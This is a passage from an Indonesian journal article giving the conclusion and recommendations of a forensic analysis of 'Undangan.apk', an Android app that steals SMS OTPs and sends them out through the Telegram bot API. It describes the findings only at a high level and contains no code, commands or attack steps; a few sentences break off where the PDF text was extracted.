Penggunaan API bot Telegram pada fase Command and Control berkaitan dengan aktivitas sebelumnya dalam serangan.
Gambar 12.
Chain of Correlate Artifacts Berdasarkan korelasi antar artefak yang didapatkan.
CoA dibangun, yang menunjukkan urutan peristiwa dan hubungan antara artefak-artefak dalam serangan.
Analisis CoA ini memberikan wawasan mendalam tentang perkembangan serangan, menegaskan kebutuhan akan respons keamanan yang komprehensif dan terkoordinasi untuk mengatasi dampak serangan siber tersebut.
KESIMPULAN
Berdasarkan hasil analisis yang dilakukan menggunakan berbagai metode, dapat disimpulkan bahwa aplikasi Undangan.
apk merupakan sebuah ancaman keamanan serius bagi pengguna perangkat android.
Analisis Qu1cksc0pe memberikan wawasan tentang karakteristik dan sifat aplikasi, termasuk izin yang diberikan dan aktivitas yang Analisis dinamis menunjukkan bahwa aplikasi ini melakukan komunikasi dengan server melalui API bot Telegram, yang kemungkinan besar digunakan untuk pengiriman data yang telah dicuri.
Analisis reverse engineering menegaskan dugaan bahwa aplikasi ini dirancang untuk mencuri SMS OTP dengan mengirimkan pesan dan informasi yang dicuri ke server tertentu.
Terakhir, analisis menggunakan Framework D4I mengidentifikasi urutan peristiwa dan hubungan antara artefak dalam serangan, memberikan pemahaman yang lebih dalam tentang cara kerja dan perkembangan Ciptaan disebarluaskan di bawah Lisensi Creative Commons Attribution 4.
0 International License.
Jurnal Ilmu Komputer dan Desain Komunikasi Visual Volume 10.
Nomor 2.
Desember 2025 ISSN (Ceta.
: 2541-4550 ISSN (Onlin.
: 2541-4585 serangan tersebut.
Kesimpulannya, aplikasi Undangan.
apk merupakan ancaman serius yang memerlukan respons keamanan yang komprehensif dan terkoordinasi untuk melindungi pengguna dari risiko pencurian data dan akses yang tidak sah.
SARAN
Penelitian ini menunjukkan pentingnya deteksi malware pada aplikasi Android, namun riset lebih lanjut diperlukan untuk mengembangkan teknik deteksi malware zeroday yang lebih efektif, mengingat banyak varian malware yang menggunakan teknik Selain itu, penggunaan teknologi blockchain atau AI-based threat detection bisa menjadi pendekatan baru untuk meningkatkan keamanan perangkat Android dalam menghadapi serangan malware canggih.
Selanjutnya, penelitian juga perlu mengevaluasi keterbatasan dan perbaikan pada Framework D4I untuk aplikasi analisis malware Android.
Di samping pendekatan teknis, riset yang berfokus pada edukasi pengguna Android dan peningkatan pengawasan aplikasi di Google Play Store akan sangat membantu dalam mengurangi risiko malware dengan cara yang lebih preventif.
DAFTAR PUSTAKA